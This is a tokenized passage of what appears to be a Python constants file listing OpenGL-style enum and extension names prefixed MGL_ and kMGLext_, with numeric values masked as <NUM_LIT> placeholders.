MGL_OBJECT_ACTIVE_ATTRIBUTE_MAX_LENGTH_ARB = <NUM_LIT> <EOL> MGL_FLOAT_RG_NV = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_TRANSPOSE_PROJECTION_MATRIX_ARB = <NUM_LIT> <EOL> MGL_POINT_SIZE_GRANULARITY = <NUM_LIT> <EOL> MGL_FLOAT_R_NV = <NUM_LIT> <EOL> MGL_COLOR_TABLE_WIDTH_EXT = <NUM_LIT> <EOL> MGL_FOG_BIT = <NUM_LIT> <EOL> MGL_POINT_SIZE_RANGE = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_G_SIZE = <NUM_LIT> <EOL> MGL_COLOR_CLEAR_UNCLAMPED_VALUE_ATI = <NUM_LIT> <EOL> MGL_ELEMENT_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_MODELVIEW_MATRIX = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_COORDS_ARB = <NUM_LIT> <EOL> MGL_PREVIOUS = <NUM_LIT> <EOL> MGL_RGBA_FLOAT_MODE_ATI = <NUM_LIT> <EOL> MGL_SET = <NUM_LIT> <EOL> MGL_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_TEX_INDIRECTIONS_ARB = <NUM_LIT> <EOL> MGL_MIRROR_CLAMP_TO_EDGE_ATI = <NUM_LIT> <EOL> kMGLext_NV_vertex_array_range = <NUM_LIT> <EOL> MGL_ELEMENT_ARRAY_BUFFER_ARB = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_DISTANCE = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_Y_ARB = <NUM_LIT> <EOL> MGL_ALPHA16 = <NUM_LIT> <EOL> MGL_VARIABLE_A_NV = <NUM_LIT> <EOL> MGL_ARRAY_BUFFER_ARB = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_POSITION_VALID = <NUM_LIT> <EOL> MGL_OBJECT_ACTIVE_ATTRIBUTES_ARB = <NUM_LIT> <EOL> MGL_VARIANT_ARRAY_EXT = <NUM_LIT> <EOL> MGL_ALPHA12 = <NUM_LIT> <EOL> MGL_MATRIX31 = <NUM_LIT> <EOL> MGL_TRANSPOSE_MODELVIEW_MATRIX_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_Z = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_POSITION = <NUM_LIT> <EOL> MGL_ALPHA8 = <NUM_LIT> <EOL> MGL_CLIP_PLANE2 = <NUM_LIT> <EOL> MGL_MATRIX30 = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_TEX_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_SCALE_BY_FOUR_NV = <NUM_LIT> <EOL> MGL_ALPHA4 = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_X_ARB = <NUM_LIT> <EOL> kMGLext_color_table = <NUM_LIT> <EOL> MGL_MATRIX29 = <NUM_LIT> <EOL> MGL_MIN = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_INDEX = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_FILL = <NUM_LIT> <EOL> MGL_REG_3_ATI = <NUM_LIT> <EOL> MGL_MATRIX28 = <NUM_LIT> <EOL> MGL_SUBTRACT = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_COLOR = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_LINE = <NUM_LIT> <EOL> MGL_N3F_V3F = <NUM_LIT> <EOL> MGL_CURRENT_TEXTURE_COORDS = <NUM_LIT> <EOL> MGL_TEXTURE_BORDER_VALUES_NV = <NUM_LIT> <EOL> MGL_REGISTER_COMBINERS_NV = <NUM_LIT> <EOL> MGL_C4F_N3F_V3F = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_ALU_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_MAX_COMBINED_TEXTURE_IMAGE_UNITS_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_MAX_ANISOTROPY_EXT = <NUM_LIT> <EOL> MGL_VIBRANCE_BIAS_NV = <NUM_LIT> <EOL> kMGLext_ARB_occlusion_query = <NUM_LIT> <EOL> MGL_MATRIX25 = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_SEPARATE_COMPONENTS_EXT = <NUM_LIT> <EOL> MGL_CURRENT_INDEX = <NUM_LIT> <EOL> MGL_MAGNITUDE_BIAS_NV = <NUM_LIT> <EOL> MGL_T4F_C4F_N3F_V4F = <NUM_LIT> <EOL> MGL_C3F_V3F = <NUM_LIT> <EOL> MGL_CURRENT_COLOR = <NUM_LIT> <EOL> MGL_SCALE_BY_TWO_NV = <NUM_LIT> <EOL> MGL_DT_BIAS_NV = <NUM_LIT> <EOL> MGL_C4UB_V3F = <NUM_LIT> <EOL> MGL_SIGNED_INTENSITY_NV = <NUM_LIT> <EOL> MGL_DOMAIN = <NUM_LIT> <EOL> MGL_DS_BIAS_NV = <NUM_LIT> <EOL> MGL_OR_INVERTED = <NUM_LIT> <EOL> MGL_C4UB_V2F = <NUM_LIT> <EOL> MGL_FRAGMENT_PROGRAM_ARB = <NUM_LIT> <EOL> MGL_LO_BIAS_NV = <NUM_LIT> <EOL> MGL_MATRIX21 = <NUM_LIT> <EOL> MGL_COEFF = <NUM_LIT> <EOL> MGL_REG_4_ATI = <NUM_LIT> <EOL> MGL_HI_BIAS_NV = <NUM_LIT> <EOL> MGL_TEXTURE_3D = <NUM_LIT> <EOL> MGL_MATRIX20 = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSED = <NUM_LIT> <EOL> MGL_CCW = <NUM_LIT> <EOL> MGL_VIBRANCE_SCALE_NV = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_MODE_EXT = <NUM_LIT> <EOL> MGL_CW = <NUM_LIT> <EOL> MGL_MAGNITUDE_SCALE_NV = <NUM_LIT> <EOL> MGL_T2F_C4F_N3F_V3F = <NUM_LIT> <EOL> MGL_MATRIX18 = <NUM_LIT> <EOL> MGL_EXP2 = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_I_SIZE = <NUM_LIT> <EOL> MGL_DT_SCALE_NV = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_FUNC_ADD = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_COORDS_NV = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_DS_SCALE_NV = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB8_4_NV = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_FRAGMENT_PROGRAM_NV = <NUM_LIT> <EOL> MGL_ALPHA_TEST_FUNC = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_INTERLEAVED_COMPONENTS_EXT = <NUM_LIT> <EOL> MGL_HI_SCALE_NV = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_POINTER_NV = <NUM_LIT> <EOL> kMGLext_EXT_secondary_color = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_POINTER = <NUM_LIT> <EOL> MGL_FENCE_STATUS_NV = <NUM_LIT> <EOL> MGL_SIGNED_RGB8_UNSIGNED_ALPHA8_NV = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_VARYING_MAX_LENGTH_EXT = <NUM_LIT> <EOL> MGL_ALL_COMPLETED_NV = <NUM_LIT> <EOL> MGL_ATTRIB_STACK_DEPTH = <NUM_LIT> <EOL> MGL_T2F_N3F_V3F = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_PRIMITIVES_GENERATED_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_RED_SIZE = <NUM_LIT> <EOL> MGL_DSDT8_MAG8_INTENSITY8_NV = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_MUL_ATI = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_SIZE_EXT = <NUM_LIT> <EOL> MGL_PROJECTION_MATRIX = <NUM_LIT> <EOL> MGL_OR_REVERSE = <NUM_LIT> <EOL> kMGLext_texture_env_dot3 = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_SIZE = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_START_EXT = <NUM_LIT> <EOL> MGL_MAX_VERTEX_SHADER_INSTRUCTIONS_EXT = <NUM_LIT> <EOL> MGL_DSDT8_NV = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_OP_LOG_BASE_2_EXT = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_VARYINGS_EXT = <NUM_LIT> <EOL> MGL_SIGNED_INTENSITY8_NV = <NUM_LIT> <EOL> MGL_MAX_VERTEX_ARRAY_RANGE_ELEMENT_NV = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_UNITS_ARB = <NUM_LIT> <EOL> MGL_PROJECTION_STACK_DEPTH = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_BINDING_NV = <NUM_LIT> <EOL> MGL_CLIENT_ACTIVE_TEXTURE_ARB = <NUM_LIT> <EOL> MGL_MODELVIEW_STACK_DEPTH = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD14_EXT = <NUM_LIT> <EOL> MGL_OP_POWER_EXT = <NUM_LIT> <EOL> MGL_ACTIVE_TEXTURE_ARB = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_PARAMETERS = <NUM_LIT> <EOL> MGL_VIEWPORT = <NUM_LIT> <EOL> MGL_AND_REVERSE = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_SIZE = <NUM_LIT> <EOL> MGL_BLEND_COLOR = <NUM_LIT> <EOL> MGL_TEXTURE31_ARB = <NUM_LIT> <EOL> MGL_NORMALIZE = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB6_4_NV = <NUM_LIT> <EOL> MGL_OP_EXP_BASE_2_EXT = <NUM_LIT> <EOL> MGL_TEXTURE30_ARB = <NUM_LIT> <EOL> MGL_LOCAL_EXT = <NUM_LIT> <EOL> MGL_MATRIX_MODE = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_NV = <NUM_LIT> <EOL> kMGLext_NV_texture_shader = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_SEPARATE_ATTRIBS_NV = <NUM_LIT> <EOL> MGL_STENCIL_WRITEMASK = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_VALID_NV = <NUM_LIT> <EOL> MGL_OP_FLOOR_EXT = <NUM_LIT> <EOL> MGL_INTERLEAVED_ATTRIBS_NV = <NUM_LIT> <EOL> MGL_STENCIL_REF = <NUM_LIT> <EOL> MGL_OP_CLAMP_EXT = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_NV = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_SEPARATE_ATTRIBS_NV = <NUM_LIT> <EOL> MGL_STENCIL_PASS_DEPTH_PASS = <NUM_LIT> <EOL> MGL_T2F_C4UB_V3F = <NUM_LIT> <EOL> MGL_TEXTURE_WRAP_T = <NUM_LIT> <EOL> MGL_OP_SET_LT_EXT = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_INTERLEAVED_COMPONENTS_NV = <NUM_LIT> <EOL> MGL_RGBA12 = <NUM_LIT> <EOL> MGL_STENCIL_PASS_DEPTH_FAIL = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_POSITIVE_X_ARB = <NUM_LIT> <EOL> kMGLext_color_matrix = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY = <NUM_LIT> <EOL> MGL_MOV_ATI = <NUM_LIT> <EOL> MGL_RASTERIZER_DISCARD_NV = <NUM_LIT> <EOL> MGL_STENCIL_FAIL = <NUM_LIT> <EOL> MGL_EQUIV = <NUM_LIT> <EOL> MGL_NUM_FRAGMENT_CONSTANTS_ATI = <NUM_LIT> <EOL> MGL_OP_MIN_EXT = <NUM_LIT> <EOL> MGL_TEXTURE24_ARB = <NUM_LIT> <EOL> MGL_EVAL_BIT = <NUM_LIT> <EOL> MGL_INVARIANT_EXT = <NUM_LIT> <EOL> MGL_STENCIL_VALUE_MASK = <NUM_LIT> <EOL> MGL_INDEX_ARRAY = <NUM_LIT> <EOL> MGL_OP_ROUND_EXT = <NUM_LIT> <EOL> MGL_PRIMITIVES_GENERATED_NV = <NUM_LIT> <EOL> MGL_STENCIL_FUNC = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_LENGTH_NV = <NUM_LIT> <EOL> MGL_RENDER = <NUM_LIT> <EOL> MGL_COLOR_SUM_CLAMP_NV = <NUM_LIT> <EOL> MGL_COLOR_ARRAY = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_RECORD_NV = <NUM_LIT> <EOL> MGL_STENCIL_CLEAR_VALUE = <NUM_LIT> <EOL> kMGLext_ARB_fragment_program = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY = <NUM_LIT> <EOL> MGL_TEXTURE29_ARB = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_SIZE_NV = <NUM_LIT> <EOL> MGL_STENCIL_TEST = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD12_EXT = <NUM_LIT> <EOL> MGL_CON_8_ATI = <NUM_LIT> <EOL> MGL_OP_ADD_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_ALPHA_SIZE = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_START_NV = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_PARAMETERS = <NUM_LIT> <EOL> MGL_ACCUM_CLEAR_VALUE = <NUM_LIT> <EOL> MGL_OP_MUL_EXT = <NUM_LIT> <EOL> MGL_CON_31_ATI = <NUM_LIT> <EOL> MGL_DEPTH_ATTACHMENT = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_VARYINGS_NV = <NUM_LIT> <EOL> MGL_DEPTH_FUNC = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB4_4_NV = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_buffer_region = <NUM_LIT> <EOL> MGL_OP_DOT4_EXT = <NUM_LIT> <EOL> MGL_ACTIVE_VARYING_MAX_LENGTH_NV = <NUM_LIT> <EOL> MGL_LIST_BIT = <NUM_LIT> <EOL> MGL_DEPTH_CLEAR_VALUE = <NUM_LIT> <EOL> MGL_4X_BIT_ATI = <NUM_LIT:2> <EOL> MGL_OP_DOT3_EXT = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_STRIDE = <NUM_LIT> <EOL> MGL_ACTIVE_VARYINGS_NV = <NUM_LIT> <EOL> MGL_DEPTH_WRITEMASK = <NUM_LIT> <EOL> MGL_SWIZZLE_STRQ_ATI = <NUM_LIT> <EOL> MGL_OP_NEGATE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_COMPRESSED_IMAGE_SIZE = <NUM_LIT> <EOL> MGL_MAX_TRANSFORM_FEEDBACK_SEPARATE_COMPONENTS_NV = <NUM_LIT> <EOL> MGL_DEPTH_TEST = <NUM_LIT> <EOL> MGL_OP_INDEX_EXT = <NUM_LIT> <EOL> MGL_TEXTURE28_ARB = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_BUFFER_MODE_NV = <NUM_LIT> <EOL> MGL_DEPTH_RANGE = <NUM_LIT> <EOL> MGL_T2F_V3F = <NUM_LIT> <EOL> MGL_AMBIENT_AND_DIFFUSE = <NUM_LIT> <EOL> MGL_TEXTURE_1D_BINDING = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_ATTRIBS_NV = <NUM_LIT> <EOL> MGL_FOG_COLOR = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_2D = <NUM_LIT> <EOL> MGL_CONSTANT_ALPHA_EXT = <NUM_LIT> <EOL> MGL_GENERIC_ATTRIB_NV = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_FOG_MODE = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB3_4_NV = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_NORMAL_MODE_QUADRATIC_ATI = <NUM_LIT> <EOL> MGL_PRIMITIVE_ID_NV = <NUM_LIT> <EOL> MGL_TEXTURE2_ARB = <NUM_LIT> <EOL> MGL_DECR_WRAP_EXT = <NUM_LIT> <EOL> MGL_GEQUAL = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_NORMAL_MODE_LINEAR_ATI = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_TYPE = <NUM_LIT> <EOL> MGL_TEXTURE11 = <NUM_LIT> <EOL> MGL_TEXTURE_GREEN_TYPE = <NUM_LIT> <EOL> MGL_FOG_START = <NUM_LIT> <EOL> MGL_FIXED_ONLY = <NUM_LIT> <EOL> kMGLext_EXT_cull_vertex = <NUM_LIT:50> <EOL> MGL_VERTEX_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_POINT_MODE_CUBIC_ATI = <NUM_LIT> <EOL> MGL_CLIP_DISTANCE_NV = <NUM_LIT> <EOL> MGL_SOURCE2_RGB = <NUM_LIT> <EOL> MGL_FOG_DENSITY = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_POINT_MODE_LINEAR_ATI = <NUM_LIT> <EOL> MGL_TEXTURE27_ARB = <NUM_LIT> <EOL> MGL_TEXTURE9 = <NUM_LIT> <EOL> MGL_FOG_INDEX = <NUM_LIT> <EOL> MGL_LEQUAL = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_TESSELATION_LEVEL_ATI = <NUM_LIT> <EOL> MGL_SOURCE2_RGB_EXT = <NUM_LIT> <EOL> MGL_BACK_SECONDARY_COLOR_NV = <NUM_LIT> <EOL> MGL_FOG = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_NORMAL_MODE_ATI = <NUM_LIT> <EOL> MGL_POLYGON_STIPPLE_BIT = <NUM_LIT:16> <EOL> MGL_OBJECT_ACTIVE_UNIFORM_MAX_LENGTH_ARB = <NUM_LIT> <EOL> MGL_BACK_PRIMARY_COLOR_NV = <NUM_LIT> <EOL> MGL_COLOR_MATERIAL = <NUM_LIT> <EOL> MGL_VBO_FREE_MEMORY_ATI = <NUM_LIT> <EOL> kMGLext_texture_env_combine = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_POINT_MODE_ATI = <NUM_LIT> <EOL> MGL_BUFFER_MAP_POINTER_ARB = <NUM_LIT> <EOL> MGL_MATRIX_EXT = <NUM_LIT> <EOL> MGL_COLOR_MATERIAL_PARAMETER = <NUM_LIT> <EOL> MGL_MAX_PN_TRIANGLES_TESSELATION_LEVEL_ATI = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_SIZE = <NUM_LIT> <EOL> MGL_BUFFER_MAPPED_ARB = <NUM_LIT> <EOL> MGL_COLOR_MATERIAL_FACE = <NUM_LIT> <EOL> MGL_DRAW_BUFFER = <NUM_LIT> <EOL> MGL_PN_TRIANGLES_ATI = <NUM_LIT> <EOL> MGL_BUFFER_ACCESS_ARB = <NUM_LIT> <EOL> MGL_LIGHT_MODEL_LOCAL_VIEWER = <NUM_LIT> <EOL> MGL_SHADE_MODEL = <NUM_LIT> <EOL> MGL_QUERY_RESULT_AVAILABLE_ARB = <NUM_LIT> <EOL> MGL_TEXTURE26_ARB = <NUM_LIT> <EOL> MGL_BUFFER_USAGE_ARB = <NUM_LIT> <EOL> MGL_LIGHT_MODEL_AMBIENT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD9_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_ENV = <NUM_LIT> <EOL> MGL_QUERY_RESULT_ARB = <NUM_LIT> <EOL> MGL_TEXTURE2 = <NUM_LIT> <EOL> MGL_MAX_VERTEX_TEXTURE_IMAGE_UNITS_ARB = <NUM_LIT> <EOL> MGL_CURRENT_QUERY_ARB = <NUM_LIT> <EOL> MGL_CON_28_ATI = <NUM_LIT> <EOL> MGL_TEXTURE1 = <NUM_LIT> <EOL> MGL_INVALID_ENUM = <NUM_LIT> <EOL> MGL_COMPRESSED_RGBA_ARB = <NUM_LIT> <EOL> MGL_NOOP = <NUM_LIT> <EOL> MGL_SAMPLES_PASSED_ARB = <NUM_LIT> <EOL> MGL_TEXTURE0 = <NUM_LIT> <EOL> MGL_ALL_ATTRIB_BITS = <NUM_LIT> <EOL> MGL_COMPRESSED_RGB_ARB = <NUM_LIT> <EOL> MGL_REG_14_ATI = <NUM_LIT> <EOL> kMGLext_NV_register_combiners = <NUM_LIT> <EOL> MGL_PIXEL_MAP_B_TO_B = <NUM_LIT> <EOL> MGL_OP_SET_GE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_COMPONENTS = <NUM_LIT> <EOL> MGL_COMPRESSED_INTENSITY_ARB = <NUM_LIT> <EOL> MGL_SWIZZLE_STQ_ATI = <NUM_LIT> <EOL> MGL_PIXEL_COUNT_AVAILABLE_NV = <NUM_LIT> <EOL> MGL_LOGIC_OP = <NUM_LIT> <EOL> MGL_OFFSET_TEXTURE_2D_BIAS_NV = <NUM_LIT> <EOL> MGL_FLOAT_MAT4_ARB = <NUM_LIT> <EOL> MGL_VARIANT_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_PIXEL_MAP_R_TO_R = <NUM_LIT> <EOL> MGL_TEXTURE25_ARB = <NUM_LIT> <EOL> MGL_TEXTURE4 = <NUM_LIT> <EOL> MGL_GENERATE_MIPMAP_SGIS = <NUM_LIT> <EOL> MGL_COMPRESSED_LUMINANCE_ARB = <NUM_LIT> <EOL> MGL_3_BYTES = <NUM_LIT> <EOL> MGL_TEXTURE_WRAP_S = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_A = <NUM_LIT> <EOL> MGL_TEXTURE_2D_BINDING = <NUM_LIT> <EOL> MGL_OCCLUSION_TEST_RESULT_HP = <NUM_LIT> <EOL> MGL_FLOAT_MAT2_ARB = <NUM_LIT> <EOL> kMGLext_histogram = <NUM_LIT> <EOL> MGL_XOR = <NUM_LIT> <EOL> MGL_PIXEL_COUNTER_BITS_NV = <NUM_LIT> <EOL> MGL_CON_27_ATI = <NUM_LIT> <EOL> MGL_OCCLUSION_TEST_HP = <NUM_LIT> <EOL> MGL_SOURCE3_RGB_NV = <NUM_LIT> <EOL> MGL_TEXTURE_MATRIX = <NUM_LIT> <EOL> MGL_BOOL_VEC4_ARB = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB0_4_NV = <NUM_LIT> <EOL> MGL_NUM_FRAGMENT_REGISTERS_ATI = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_G = <NUM_LIT> <EOL> MGL_ADD_SIGNED = <NUM_LIT> <EOL> MGL_FOG_SPECULAR_TEXTURE_WIN = <NUM_LIT> <EOL> MGL_MAP2_INDEX = <NUM_LIT> <EOL> MGL_VARIANT_EXT = <NUM_LIT> <EOL> MGL_BOOL_VEC3_ARB = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_R = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY = <NUM_LIT> <EOL> MGL_PHONG_HINT_WIN = <NUM_LIT> <EOL> MGL_BOOL_VEC2_ARB = <NUM_LIT> <EOL> MGL_COLOR_LOGIC_OP = <NUM_LIT> <EOL> MGL_NUM_GENERAL_COMBINERS_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_S_TO_S = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_PRIMITIVES_WRITTEN_EXT = <NUM_LIT> <EOL> MGL_INVALID_FRAMEBUFFER_OPERATION = <NUM_LIT> <EOL> MGL_PHONG_WIN = <NUM_LIT> <EOL> MGL_OFFSET_TEXTURE_2D_SCALE_NV = <NUM_LIT> <EOL> MGL_MAX_LIGHTS = <NUM_LIT> <EOL> MGL_BOOL_ARB = <NUM_LIT> <EOL> kMGLext_ARB_vertex_program = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_I = <NUM_LIT> <EOL> MGL_TRANSFORM_FEEDBACK_PRIMITIVES_WRITTEN_NV = <NUM_LIT> <EOL> MGL_COLOR_INDEX16_EXT = <NUM_LIT> <EOL> MGL_INT_VEC4_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_Q = <NUM_LIT> <EOL> MGL_COLOR_INDEX12_EXT = <NUM_LIT> <EOL> MGL_CONSTANT_ALPHA = <NUM_LIT> <EOL> kMGLext_multi_draw_arrays = <NUM_LIT> <EOL> MGL_INT_VEC3_ARB = <NUM_LIT> <EOL> MGL_VARIABLE_E_NV = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_R = <NUM_LIT> <EOL> MGL_CONSTANT_COLOR_EXT = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY9_NV = <NUM_LIT> <EOL> MGL_COLOR_TABLE_GREEN_SIZE_EXT = <NUM_LIT> <EOL> MGL_COLOR_INDEX8_EXT = <NUM_LIT> <EOL> MGL_SRC_COLOR = <NUM_LIT> <EOL> MGL_INT_VEC2_ARB = <NUM_LIT> <EOL> MGL_COPY = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_extensions_string = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_T = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD28_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_FOG_EXT = <NUM_LIT> <EOL> MGL_MODELVIEW0_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_GEN_S = <NUM_LIT> <EOL> MGL_OP_MAX_EXT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD27_EXT = <NUM_LIT> <EOL> MGL_FLOAT_VEC3_ARB = <NUM_LIT> <EOL> MGL_INDEX_LOGIC_OP = <NUM_LIT> <EOL> MGL_FOG_HINT = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD26_EXT = <NUM_LIT> <EOL> MGL_CULL_FACE_MODE = <NUM_LIT> <EOL> MGL_MODELVIEW_MATRIX1_EXT = <NUM_LIT> <EOL> MGL_POLYGON_SMOOTH_HINT = <NUM_LIT> <EOL> MGL_TEXTURE23_ARB = <NUM_LIT> <EOL> MGL_DST_ALPHA = <NUM_LIT> <EOL> MGL_PROGRAM_TEX_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_MODELVIEW0_MATRIX_EXT = <NUM_LIT> <EOL> MGL_LINE_SMOOTH_HINT = <NUM_LIT> <EOL> kMGLext_MGLX_create_context_with_config_sgix = <NUM_LIT> <EOL> MGL_ONE_MINUS_DST_ALPHA = <NUM_LIT> <EOL> MGL_PACK_SWAP_BYTES = <NUM_LIT> <EOL> MGL_MODELVIEW1_STACK_DEPTH_EXT = <NUM_LIT> <EOL> MGL_TRANSPOSE_COLOR_MATRIX_ARB = <NUM_LIT> <EOL> MGL_POINT_SMOOTH_HINT = <NUM_LIT> <EOL> MGL_CON_25_ATI = <NUM_LIT> <EOL> MGL_COLOR_TABLE_ALPHA_SIZE_EXT = <NUM_LIT> <EOL> MGL_POINT_SMOOTH = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_MODELVIEW0_STACK_DEPTH_EXT = <NUM_LIT> <EOL> MGL_NORMAL_MAP = <NUM_LIT> <EOL> MGL_PERSPECTIVE_CORRECTION_HINT = <NUM_LIT> <EOL> MGL_ONE_MINUS_DST_COLOR = <NUM_LIT> <EOL> MGL_SRC_ALPHA = <NUM_LIT> <EOL> MGL_BACK_RIGHT = <NUM_LIT> <EOL> MGL_OBJECT_ACTIVE_UNIFORMS_ARB = <NUM_LIT> <EOL> MGL_RENDER_MODE = <NUM_LIT> <EOL> MGL_OP_FRAC_EXT = <NUM_LIT> <EOL> MGL_SRC_ALPHA_SATURATE = <NUM_LIT> <EOL> MGL_OBJECT_ATTACHED_OBJECTS_ARB = <NUM_LIT> <EOL> MGL_LOGIC_OP_MODE = <NUM_LIT> <EOL> kMGLext_EXT_compiled_vertex_array = <NUM_LIT> <EOL> MGL_STEREO = <NUM_LIT> <EOL> MGL_OBJECT_DELETE_STATUS_ARB = <NUM_LIT> <EOL> MGL_COLOR_TABLE_RED_SIZE_EXT = <NUM_LIT> <EOL> MGL_REG_31_ATI = <NUM_LIT> <EOL> MGL_OBJECT_INFO_LOG_LENGTH_ARB = <NUM_LIT> <EOL> MGL_DOUBLEBUFFER = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY4_NV = 